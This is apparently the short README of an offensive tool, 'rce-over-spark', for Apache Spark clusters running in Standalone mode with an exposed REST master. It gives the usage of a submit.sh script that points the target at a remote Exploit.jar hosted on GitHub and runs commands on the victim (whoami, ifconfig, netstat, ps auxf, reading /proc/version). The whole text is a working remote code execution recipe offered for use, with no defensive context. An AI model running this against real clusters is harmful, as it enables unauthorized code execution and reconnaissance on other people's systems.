- Spark is running on Standalone Mode.
- REST URL of Master is accessible.
./submit.sh spark_rest_url spark_version jar_url commands
./submit.sh \
1.1.1.1:6066 \
2.2.0 \
https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar \
"whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
Good Luck!